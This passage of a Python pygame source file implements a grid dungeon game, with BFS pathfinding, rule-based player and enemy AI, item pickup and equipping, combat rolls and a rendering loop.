enemies.append(i)\r\n\r\n\r\ntrue_scroll = [0, 0]\r\nspeed = 2\r\ndrop_proc = 10\r\n\r\n\r\ndef get_map_dimensions(path, level):\r\n f = open(path + '_' + str(level) + '.txt', 'r')\r\n data = f.read()\r\n f.close()\r\n data = data.split('\\n')\r\n temp_game_map = []\r\n for row in data:\r\n temp_game_map.append(list(row))\r\n map_dim = [len(temp_game_map[0])-1, len(temp_game_map)-1]\r\n return map_dim\r\n\r\n\r\ndef load_map(path, level):\r\n f = open(path + \"_\" + str(level) + '.txt', 'r')\r\n data = f.read()\r\n f.close()\r\n data = data.split('\\n')\r\n temp_game_map = []\r\n for row in data:\r\n temp_game_map.append(list(row))\r\n temp_game_map = [[j for j in k] for k in temp_game_map] # --------------------------------------------------------------\r\n return temp_game_map\r\n\r\n\r\ndef get_pixels_from_chunks(chunks):\r\n return int(16 * chunks)\r\n\r\n\r\ndef get_chunks_from_pixels(pixels):\r\n return int(pixels / 16)\r\n\r\n\r\ndef collision_test(rect, tiles):\r\n hit_list = []\r\n for tile_block in tiles:\r\n if rect.colliderect(tile_block):\r\n hit_list.append(tile_block)\r\n return hit_list\r\n\r\n\r\ndef check_open_square(coordinates):\r\n x_coord, y_coord = coordinates[0], coordinates[1]\r\n if x_coord <= map_dimensions[0] and y_coord <= map_dimensions[1]:\r\n if str(game_map[y_coord][x_coord]) == \"0\":\r\n return True\r\n elif str(game_map[y_coord][x_coord]) == \"1\":\r\n return False\r\n elif str(game_map[y_coord][x_coord]) == \"2\":\r\n return False\r\n elif str(game_map[y_coord][x_coord]) == \"3\":\r\n return False\r\n elif str(game_map[y_coord][x_coord]) == \"4\":\r\n return False\r\n elif str(game_map[y_coord][x_coord]) == \"*\":\r\n return False\r\n else:\r\n return False\r\n\r\n\r\ndef find_objects_around(coordinates):\r\n # Checks the full 8 squares around the player\r\n list_of_objects = []\r\n list_of_coords = [[coordinates[0], coordinates[1] + 1], [coordinates[0] + 1, coordinates[1] + 1],\r\n [coordinates[0] + 1, coordinates[1]], [coordinates[0] + 1, coordinates[1] - 1],\r\n [coordinates[0], coordinates[1] - 1], [coordinates[0] - 1, coordinates[1] - 1],\r\n [coordinates[0] - 1, coordinates[1]], [coordinates[0] - 1, coordinates[1] + 1]]\r\n for object_around in objects:\r\n for coord in list_of_coords:\r\n if object_around.get_position() == [coord[0], coord[1]]:\r\n list_of_objects.append(object_around)\r\n else:\r\n pass\r\n return list_of_objects\r\n\r\n\r\ndef move(rect, movement, tiles):\r\n collision_types = {'top': False, 'bottom': False, 'right': False, 'left': False}\r\n movement[0], movement[1] = get_pixels_from_chunks(movement[0]), get_pixels_from_chunks(movement[1])\r\n rect.x += movement[0]\r\n hit_list = collision_test(rect, tiles)\r\n for tile_block in hit_list:\r\n if movement[0] > 0:\r\n rect.right = tile_block.left\r\n collision_types['right'] = True\r\n elif movement[0] < 0:\r\n rect.left = tile_block.right\r\n collision_types['left'] = True\r\n rect.y += movement[1]\r\n hit_list = collision_test(rect, tiles)\r\n for tile_block in hit_list:\r\n if movement[1] > 0:\r\n rect.bottom = tile_block.top\r\n collision_types['bottom'] = True\r\n elif movement[1] < 0:\r\n rect.top = tile_block.bottom\r\n collision_types['top'] = True\r\n return rect, collision_types\r\n\r\n\r\ndef find_enemy_in_area(person):\r\n # returns an enemy of the opposite side\r\n list_of_objects = find_objects_around(person.get_position())\r\n if isinstance(person, Player):\r\n # enemy is enemy\r\n for object_in_game in list_of_objects:\r\n if isinstance(object_in_game, Enemy):\r\n return object_in_game\r\n if isinstance(person, Enemy):\r\n # enemy is player\r\n for object_in_game in list_of_objects:\r\n if isinstance(object_in_game, Player):\r\n return object_in_game\r\n else:\r\n return None\r\n\r\n\r\n# Function to find the shortest path between\r\n# a given source cell to a destination cell.\r\ndef bfs(grid, start_1, end): # takes grid, (x, y), [x,y]\r\n grid = [list(map(str, row)) for row in grid]\r\n width, height = len(grid[0]), len(grid)\r\n wall, clear, player, enemy, item_tile, portal_tile = '1', '0', '2', '3', '4', '*' # These numbers do not specify what enemy\r\n start = (start_1[0], start_1[1])\r\n queue = collections.deque([[start]])\r\n seen = {start}\r\n while queue:\r\n path = queue.popleft()\r\n x_val, y_val = path[-1]\r\n if grid[y_val][x_val] != \"1\" and y_val == end[1] and x_val == end[0]:\r\n return path\r\n\r\n if grid[end[1]][end[0]] == \"0\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n if grid[end[1]][end[0]] == \"1\":\r\n return -1\r\n\r\n if grid[end[1]][end[0]] == \"2\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n if grid[end[1]][end[0]] == \"3\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n\r\n if grid[end[1]][end[0]] == \"4\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n if grid[end[1]][end[0]] == \"*\":\r\n for x2, y2 in ((x_val + 1, y_val), (x_val - 1, y_val), (x_val, y_val + 1), (x_val, y_val - 1)):\r\n if grid[y2][x2] == grid[end[1]][end[0]]:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n else:\r\n if 0 <= x2 < width and 0 <= y2 < height and \\\r\n grid[y2][x2] not in (wall, player, enemy, item_tile, portal_tile) and (x2, y2) not in seen:\r\n queue.append(path + [(x2, y2)])\r\n seen.add((x2, y2))\r\n\r\n print(\"Invalid location: \" + str(end))\r\n return -1\r\n\r\n\r\ndef find_enemies_by_range(object_in_game):\r\n list_of_all_enemies = []\r\n if isinstance(object_in_game, Player):\r\n for enemy in enemies:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), enemy.get_position())\r\n list_of_all_enemies.append([enemy, len(path_1) - 1])\r\n\r\n if isinstance(object_in_game, Enemy):\r\n for player in players:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), player.get_position())\r\n list_of_all_enemies.append([player, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_enemies, key=lambda x_element: x_element[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_enemies_in_range(object_in_game, length):\r\n list_of_all_enemies = []\r\n if isinstance(object_in_game, Player):\r\n for enemy in enemies:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), enemy.get_position())\r\n if len(path_1) <= length:\r\n # print(\"Enemy \" + object.get_name() + \" is \" + str(len(path_1)) + \"blocks away\")\r\n list_of_all_enemies.append([enemy, len(path_1) - 1])\r\n else:\r\n pass\r\n\r\n if isinstance(object_in_game, Enemy):\r\n for player in players:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), player.get_position())\r\n # list_of_all_enemies.append([player, len(path_1) - 1])\r\n # print(\"Player \" + object.get_name() + \" is \" + str(len(path_1)) + \"blocks away\")\r\n if len(path_1) <= length:\r\n list_of_all_enemies.append([player, len(path_1) - 1])\r\n else:\r\n pass\r\n\r\n sorted_list = sorted(list_of_all_enemies, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef shortest_dist_to_enemy(object_in_game):\r\n list_of_all_enemies = []\r\n if isinstance(object_in_game, Player):\r\n for enemy in enemies:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), enemy.get_position())\r\n list_of_all_enemies.append([enemy, len(path_1) - 1])\r\n\r\n if isinstance(object_in_game, Enemy):\r\n for player in players:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), player.get_position())\r\n list_of_all_enemies.append([player, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_enemies, key=lambda x_val: x_val[1])\r\n if len(sorted_list) != 0:\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[1])\r\n length_away = newly_sorted_list[0] - 1\r\n else:\r\n length_away = float('inf')\r\n return length_away\r\n\r\n\r\ndef shortest_dist_to_item(object_in_game):\r\n list_of_all_items = []\r\n for item_tile in items:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), item_tile.get_position())\r\n list_of_all_items.append([item_tile, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n if len(sorted_list) != 0:\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[1])\r\n length_away = newly_sorted_list[0] - 1\r\n else:\r\n length_away = float('inf')\r\n return length_away\r\n\r\n\r\ndef shortest_dist_to_portal(object_in_game):\r\n list_of_all_items = []\r\n for port in portals:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), port.get_position())\r\n list_of_all_items.append([port, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n if len(sorted_list) != 0:\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[1])\r\n length_away = newly_sorted_list[0] - 1\r\n else:\r\n length_away = float('inf')\r\n return length_away\r\n\r\n\r\ndef find_items_by_range(object_in_game):\r\n list_of_all_items = []\r\n for item_tile in items:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), item_tile.get_position())\r\n list_of_all_items.append([item_tile, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_items_in_range(object_in_game, length):\r\n list_of_all_items = []\r\n for item_tile in items:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), item_tile.get_position())\r\n if len(path_1) - 1 <= length:\r\n list_of_all_items.append([item_tile, len(path_1) - 1])\r\n else:\r\n pass\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_item_in_area(person):\r\n # returns an enemy of the opposite side\r\n list_of_objects = find_objects_around(person.get_position())\r\n for object_in_game in list_of_objects:\r\n if isinstance(object_in_game, Item):\r\n return object_in_game\r\n else:\r\n pass\r\n else:\r\n return None\r\n\r\n\r\ndef find_portal_in_range(object_in_game, length):\r\n list_of_all_items = []\r\n for port in portals:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), port.get_position())\r\n if len(path_1) - 1 <= length:\r\n list_of_all_items.append([port, len(path_1) - 1])\r\n else:\r\n pass\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef find_portal_in_area(person):\r\n # returns an enemy of the opposite side\r\n list_of_objects = find_objects_around(person.get_position())\r\n for object_in_game in list_of_objects:\r\n if isinstance(object_in_game, Portal):\r\n return object_in_game\r\n else:\r\n pass\r\n else:\r\n return None\r\n\r\n\r\ndef find_portal_by_range(object_in_game):\r\n list_of_all_items = []\r\n for port in portals:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), port.get_position())\r\n list_of_all_items.append([port, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef teleport(person):\r\n person.set_position([1, 1])\r\n global map_level, game_map_clean, game_map, map_dimensions, items, portals, enemies1, enemies2, objects, characters,\\\r\n enemies\r\n map_level = 2\r\n\r\n items, portals, enemies1, enemies2 = load_new_map('map', map_level)\r\n objects = [player2]\r\n characters = [player2]\r\n\r\n enemies = []\r\n for t in items:\r\n objects.append(t)\r\n for t in portals:\r\n objects.append(t)\r\n for t in enemies1:\r\n objects.append(t)\r\n characters.append(t)\r\n enemies.append(t)\r\n for t in enemies2:\r\n objects.append(t)\r\n characters.append(t)\r\n enemies.append(t)\r\n\r\n game_map_clean = load_map('map', map_level)\r\n game_map = load_map('map', map_level)\r\n map_dimensions = get_map_dimensions('map', map_level)\r\n\r\n\r\ndef if_action_teleport(object_in_game):\r\n if find_portal_in_area(object_in_game) is not None:\r\n teleport(object_in_game)\r\n global has_teleported\r\n has_teleported = True\r\n else:\r\n print(\"Not able to teleport\")\r\n\r\n\r\ndef get_list_of_movement(player_pos, path_coords):\r\n list_of_movement = []\r\n for coord in path_coords[1:]:\r\n diff = [coord[0] - player_pos[0], coord[1] - player_pos[1]]\r\n player_pos = [coord[0] + player_pos[0], coord[1] + player_pos[1]]\r\n list_of_movement.append(diff)\r\n\r\n return list_of_movement\r\n\r\n\r\n# END CODE FOR PLAYER TO CALL\r\ndef if_action_move(game_map_temp, object_in_game):\r\n current_position = object_in_game.get_position()\r\n value_of_action = object_in_game.get_action()[1]\r\n object_rect = object_in_game.get_rect()\r\n if current_position != value_of_action:\r\n list_of_positions = bfs(game_map_temp, current_position, value_of_action)\r\n if list_of_positions != -1:\r\n list_of_moving = get_list_of_movement(current_position, list_of_positions)\r\n if len(list_of_moving) != 0:\r\n new_coords = [current_position[0] + list_of_moving[0][0], current_position[1] + list_of_moving[0][1]]\r\n if check_open_square(new_coords):\r\n object_new_pos = list_of_moving[0]\r\n object_in_game.set_position(new_coords)\r\n object_rect, collisions = move(object_rect, object_new_pos, tile_rectangles)\r\n\r\n object_in_game.set_rect(object_rect)\r\n list_of_moving.remove(list_of_moving[0])\r\n else:\r\n object_in_game.set_action(\"STAY\", object_in_game.get_position())\r\n\r\n else:\r\n object_in_game.set_action(\"STAY\", object_in_game.get_position())\r\n\r\n else:\r\n pass\r\n print(\"Bot didn't Move. Invalid location\")\r\n\r\n else:\r\n object_in_game.set_action(\"STAY\", object_in_game.get_position())\r\n\r\n\r\ndef attack(attacker, attacked):\r\n damage = 0\r\n hit_percentage = attacker.get_weapon_hit_chance() + attacker.get_accuracy_bonus() - attacked.get_agility_bonus()\r\n # print(\"Hit Percentage:\" + str(hit_percentage))\r\n # print(\"Item Damage:\" + str(attacker.get_item_damage()))\r\n # print(\"Attack Bonus:\" + str(attacker.get_attack_bonus()))\r\n # If the attack hits set the damage, otherwise it stays at 0\r\n if random.randint(1, 100) <= hit_percentage:\r\n damage = max(0, attacker.get_damage() + attacker.get_attack_bonus() - attacked.get_defense())\r\n # print(attacked.get_defense())\r\n # Checks for critical strike\r\n if random.randint(1, 10) <= (attacker.get_accuracy() - attacked.get_agility()):\r\n damage = damage * 1.5\r\n print(attacker.get_name() + \" critically struck \" + attacked.get_name() + \" for \" + str(damage) + \" damage\")\r\n else:\r\n print(attacker.get_name() + \" hit \" + attacked.get_name() + \" for \" + str(damage) + \" damage.\")\r\n else:\r\n print(attacked.get_name() + \" dodged the attack from \" + attacker.get_name() + \".\")\r\n attacked.add_current_health(-damage)\r\n print(attacked.get_name() + \" has \" + str(attacked.get_current_health()) + \" health left.\")\r\n\r\n\r\ndef if_action_attack(object_in_game):\r\n action, attacked = object_in_game.get_action()\r\n attack(object_in_game, attacked)\r\n\r\n if attacked.is_dead:\r\n if isinstance(attacked, Player):\r\n object_in_game.add_xp(attacked.get_death_xp())\r\n\r\n try:\r\n print(attacked.get_name() + \" IS DEAD+++++++++++++++\")\r\n # Drop Equipped Item\r\n try:\r\n random_drop_roll = random.randint(1, 10)\r\n if random_drop_roll < drop_proc:\r\n if attacked.get_equipped_weapon() is not None:\r\n item_from_drop = copy(attacked.get_equipped_weapon())\r\n attacked.drop_item(item_from_drop)\r\n item_from_drop.set_position(attacked.get_position())\r\n item_from_drop.set_on_ground(True)\r\n\r\n items.append(item_from_drop)\r\n objects.append(item_from_drop)\r\n [x_drop, y_drop] = attacked.get_position()\r\n game_map[y_drop][x_drop] = \"4\"\r\n else:\r\n pass\r\n finally:\r\n print(\"Attack did not go well... Check code\")\r\n\r\n players.remove(attacked)\r\n characters.remove(attacked)\r\n objects.remove(attacked)\r\n finally:\r\n pass\r\n\r\n\r\n if isinstance(attacked, Enemy):\r\n print(\"Player's xp before kill: \" + str(object_in_game.get_xp()) + \": \" + str(object_in_game.get_rank()))\r\n object_in_game.add_xp(attacked.get_death_xp())\r\n print(\"Player's xp after kill: \" + str(object_in_game.get_xp()) + \": \" + str(object_in_game.get_rank()))\r\n try:\r\n # Drop Equipped Item\r\n try:\r\n random_drop_roll = random.randint(1, 10)\r\n if random_drop_roll < drop_proc:\r\n if attacked.get_equipped_weapon() is not None:\r\n item_from_drop = copy(attacked.get_equipped_weapon())\r\n attacked.drop_item(item_from_drop)\r\n item_from_drop.set_position(attacked.get_position())\r\n item_from_drop.set_on_ground(True)\r\n\r\n items.append(item_from_drop)\r\n objects.append(item_from_drop)\r\n [x_drop, y_drop] = attacked.get_position()\r\n game_map[y_drop][x_drop] = \"4\"\r\n else:\r\n pass\r\n finally:\r\n pass\r\n\r\n print(attacked.get_name() + \" IS DEAD+++++++++++++++\")\r\n enemies.remove(attacked)\r\n characters.remove(attacked)\r\n objects.remove(attacked)\r\n finally:\r\n pass\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n\r\ndef pickup(person, pickup_item):\r\n person.get_item(pickup_item)\r\n pickup_item.set_on_ground(False)\r\n person.print_inventory()\r\n items.remove(pickup_item)\r\n objects.remove(pickup_item)\r\n person.set_has_new_weapon(True)\r\n\r\n\r\ndef if_action_pickup(object_in_game):\r\n action, item = object_in_game.get_action()\r\n pickup(object_in_game, item)\r\n\r\n\r\ndef drop(person, dropping_item):\r\n person.drop_item(dropping_item)\r\n\r\n\r\ndef if_action_drop(object_in_game):\r\n action, item = object_in_game.get_action()\r\n drop(object_in_game, item)\r\n\r\n\r\ndef activate(person, activate_item):\r\n person.set_active_potion(activate_item)\r\n\r\n\r\ndef if_action_activate(object_in_game):\r\n action, item = object_in_game.get_action()\r\n activate(object_in_game, item)\r\n\r\n\r\ndef rotate_list(given_list, num):\r\n given_list = given_list[num:] + given_list[:num]\r\n return given_list\r\n\r\n\r\ndef equip(person, equipping_item):\r\n person.set_item(equipping_item)\r\n person.set_has_new_weapon(False)\r\n\r\n\r\ndef if_action_equip(object_in_game):\r\n action, item = object_in_game.get_action()\r\n equip(object_in_game, item)\r\n\r\n\r\ndef get_player_decision(player):\r\n # Compare and equip weapons/shields code:\r\n a = True if player.get_equipped_weapon() is not None else False\r\n if a:\r\n b = len(player.get_weapons()) > 1\r\n c = player.get_has_new_weapon()\r\n item_to_equip = player.get_max_weapon_damage()\r\n d = False if item_to_equip == player.get_equipped_weapon() else True\r\n var = a and b and c and d\r\n else:\r\n var = False\r\n\r\n # try:\r\n # Checking immediate area: 1 block in any direction\r\n if find_enemy_in_area(player) is not None:\r\n enemy_to_attack = find_enemy_in_area(player)\r\n player.set_action(\"ATTACK\", enemy_to_attack)\r\n\r\n elif find_item_in_area(player) is not None:\r\n item_to_pickup = find_item_in_area(player)\r\n player.set_action(\"PICKUP\", item_to_pickup)\r\n\r\n elif find_portal_in_area(player) is not None:\r\n player.set_action(\"TELEPORT\", 0)\r\n\r\n # Equipping first gear\r\n elif player.get_equipped_weapon() is None and len(player.get_weapons()) != 0:\r\n item_to_equip = player.get_weapons()[0]\r\n player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n elif player.get_equipped_shield() is None and len(player.get_shields()) != 0:\r\n item_to_equip = player.get_shields()[0]\r\n player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n elif player.get_equipped_helmet() is None and len(player.get_helmets()) != 0:\r\n item_to_equip = player.get_helmets()[0]\r\n player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n elif player.get_equipped_necklace() is None and len(player.get_necklaces()) != 0:\r\n item_to_equip = player.get_necklaces()[0]\r\n player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n elif player.get_equipped_trinket() is None and len(player.get_all_trinkets()) != 0:\r\n item_to_equip = player.get_all_trinkets()[0]\r\n player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n # Activating Health Potion\r\n elif player.get_active_potion() is None and len(player.get_healing_potions()) != 0 and player.get_health() < 55:\r\n item_to_activate = player.get_healing_potions()[0]\r\n player.set_action(\"ACTIVATE\", item_to_activate)\r\n\r\n # Activating Speed Potion\r\n elif player.get_active_potion() is None and len(player.get_speed_potions()) != 0:\r\n item_to_activate = player.get_speed_potions()[0]\r\n player.set_action(\"ACTIVATE\", item_to_activate)\r\n\r\n # Equipping the better weapon\r\n elif var:\r\n item_to_equip = player.get_max_weapon_damage()\r\n player.set_action(\"EQUIP\", item_to_equip)\r\n player.print_inventory()\r\n\r\n elif len(player.get_weapons()) > 3:\r\n weapons = player.get_weapons()\r\n player.set_action(\"DROP\", weapons[len(weapons)-1])\r\n\r\n # This checks if enemies are closer than chest in the area\r\n elif (str(shortest_dist_to_item(player)) != 'inf' and str(shortest_dist_to_item(player)) != 'inf') and \\\r\n (shortest_dist_to_enemy(player) <= shortest_dist_to_item(player)):\r\n target = find_enemies_by_range(player)\r\n player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n # Checks if there is items and goes for them\r\n elif len(find_items_by_range(player)) != 0:\r\n target = find_items_by_range(player)\r\n player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n # Check if there is enemies and goes for them\r\n elif len(find_enemies_by_range(player)) != 0:\r\n target = find_enemies_by_range(player)\r\n player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n elif len(find_portal_by_range(player)) != 0:\r\n target = find_portal_by_range(player)\r\n player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n else:\r\n player.set_action(\"STAY\", player.get_position())\r\n\r\n return player.get_action()\r\n\r\n\r\ndef get_enemy_decision(enemy):\r\n if find_enemy_in_area(enemy) is not None:\r\n enemy_to_attack = find_enemy_in_area(enemy)\r\n enemy.set_action(\"ATTACK\", enemy_to_attack)\r\n\r\n elif len(find_enemies_in_range(enemy, 4)) != 0:\r\n target = find_enemies_in_range(enemy, 4)\r\n enemy.set_action(\"MOVE\", target[0].get_position())\r\n\r\n # elif len(find_enemies_by_range(enemy)) != 0:\r\n # target = find_enemies_by_range(enemy)\r\n # enemy.set_action(\"MOVE\", target[0].get_position())\r\n else:\r\n enemy.set_action(\"STAY\", enemy.get_position())\r\n\r\n return enemy.get_action()\r\n\r\n\r\ngame_map_clean = load_map('map', map_level)\r\ngame_map = load_map('map', map_level)\r\nmap_dimensions = get_map_dimensions('map', map_level)\r\nhas_teleported = False\r\n\r\n# Set up\r\ncounter = 0\r\ncounter_two = 0\r\nturn_count = 0\r\nwhile True:\r\n display.fill((146, 244, 255))\r\n game_loop_normal = True\r\n\r\n # true_scroll[0] += ((player1.get_rect().x + player2.get_rect().x)/2 - true_scroll[0] - 152) / 20\r\n # true_scroll[1] += ((player1.get_rect().y + player2.get_rect().y)/2 - true_scroll[1] - 106) / 20\r\n\r\n true_scroll[0] += (player2.get_rect().x - true_scroll[0] - 152) / 20\r\n true_scroll[1] += (player2.get_rect().y - true_scroll[1] - 106) / 20\r\n scroll = true_scroll.copy()\r\n scroll[0] = int(scroll[0])\r\n scroll[1] = int(scroll[1])\r\n\r\n tile_rectangles = []\r\n y = 0\r\n for layer in game_map_clean:\r\n x = 0\r\n for tile in layer:\r\n try:\r\n if int(tile) == 0:\r\n display.blit(castle_img, (x * 16 - scroll[0], y * 16 - scroll[1]))\r\n if int(tile) == 1:\r\n display.blit(dirt_img, (x * 16 - scroll[0], y * 16 - scroll[1]))\r\n if int(tile) != 0:\r\n tile_rectangles.append(pygame.Rect(x * 16, y * 16, 16, 16))\r\n except ValueError:\r\n if str(tile) == \"*\":\r\n display.blit(portal_img, (x * 16 - scroll[0], y * 16 - scroll[1]))\r\n x += 1\r\n y += 1\r\n\r\n if counter % FPS == 0: # Main Decision Code here\r\n print(\"-----------------------NEW LOOP-----------------------------\")\r\n for character in characters:\r\n character.update_self()\r\n for character in characters: # For loop after this can double action\r\n\r\n if not game_loop_normal:\r\n break\r\n\r\n move_only = False\r\n # Testing speed\r\n if isinstance(character, Player):\r\n get_player_decision(character)\r\n\r\n if isinstance(character, Enemy):\r\n get_enemy_decision(character)\r\n\r\n # This is just printing player decision for now otherwise it gets cluttered\r\n object_position = character.get_position()\r\n type_of_action, value = character.get_action()\r\n # print(character.get_name() + \" : \" + str(type_of_action) + \" : \" + str(object_position) + \" : \" +\r\n # str(character.get_current_health()))\r\n\r\n if isinstance(character, Player):\r\n print(character.get_name() + \" : \" + str(character.get_defense()) + \" : \" + str(\r\n type_of_action) + \" : \" + str(object_position) + \" : \" + str(character.get_current_health()))\r\n # print(\"PLAYER SPEED: \" + str(character.get_speed()))\r\n\r\n turn_range = 1\r\n if character.get_action()[0] == \"MOVE\" and character.get_speed() > 1:\r\n move_only = True\r\n path_2 = bfs(game_map_clean, character.get_position(), character.get_action()[1])\r\n turn_range = len(path_2)\r\n if turn_range >= character.get_speed():\r\n turn_range = character.get_speed()\r\n else:\r\n turn_range = turn_range\r\n else:\r\n move_only = False\r\n\r\n for i in range(turn_range):\r\n if isinstance(character, Player):\r\n get_player_decision(character)\r\n\r\n if isinstance(character, Enemy):\r\n get_enemy_decision(character)\r\n\r\n object_position = character.get_position()\r\n type_of_action, value = character.get_action()\r\n\r\n if type_of_action == \"ATTACK\" and not move_only:\r\n if_action_attack(character)\r\n elif type_of_action == \"MOVE\":\r\n if_action_move(game_map, character)\r\n elif type_of_action == \"PICKUP\" and not move_only:\r\n if_action_pickup(character)\r\n elif type_of_action == \"DROP\" and not move_only:\r\n if_action_drop(character)\r\n elif type_of_action == \"EQUIP\" and not move_only:\r\n if_action_equip(character)\r\n elif type_of_action == \"ACTIVATE\" and not move_only:\r\n if_action_activate(character)\r\n elif type_of_action == \"TELEPORT\" and not move_only:\r\n if_action_teleport(character)\r\n if has_teleported:\r\n game_loop_normal = False\r\n has_teleported = False\r\n break\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n if not game_loop_normal:\r\n break\r\n\r\n game_map = load_map('map', map_level)\r\n if isinstance(character, Player):\r\n if character.is_dead:\r\n players.remove(character)\r\n characters.remove(character)\r\n objects.remove(character)\r\n else:\r\n display.blit(character.get_image(),\r\n (character.get_rect().x - scroll[0], character.get_rect().y - scroll[1]))\r\n new_x, new_y = character.get_position()\r\n game_map[new_y][new_x] = \"2\"\r\n\r\n if isinstance(character, Enemy):\r\n if character.is_dead:\r\n enemies.remove(character)\r\n characters.remove(character)\r\n objects.remove(character)\r\n else:\r\n display.blit(character.get_image(),\r\n (character.get_rect().x - scroll[0], character.get_rect().y - scroll[1]))\r\n new_x, new_y = character.get_position()\r\n game_map[new_y][new_x] = \"3\"\r\n\r\n for item_box in items:\r\n if item_box.on_ground():\r\n display.blit(item_box.get_image(),\r\n (item_box.get_rect().x - scroll[0], item_box.get_rect().y - scroll[1]))\r\n new_x, new_y = item_box.get_position()\r\n game_map[new_y][new_x] = \"4\"\r\n else:\r\n items.remove(item_box)\r\n objects.remove(item_box)\r\n\r\n for all_objects in objects:\r\n display.blit(all_objects.get_image(),\r\n (all_objects.get_rect().x - scroll[0], all_objects.get_rect().y - scroll[1]))\r\n turn_count += 1\r\n counter = 0\r\n\r\n # Add item code\r\n for all_objects in objects:\r\n display.blit(all_objects.get_image(), (all_objects.get_rect().x - scroll[0],\r\n all_objects.get_rect().y - scroll[1]))\r\n\r\n 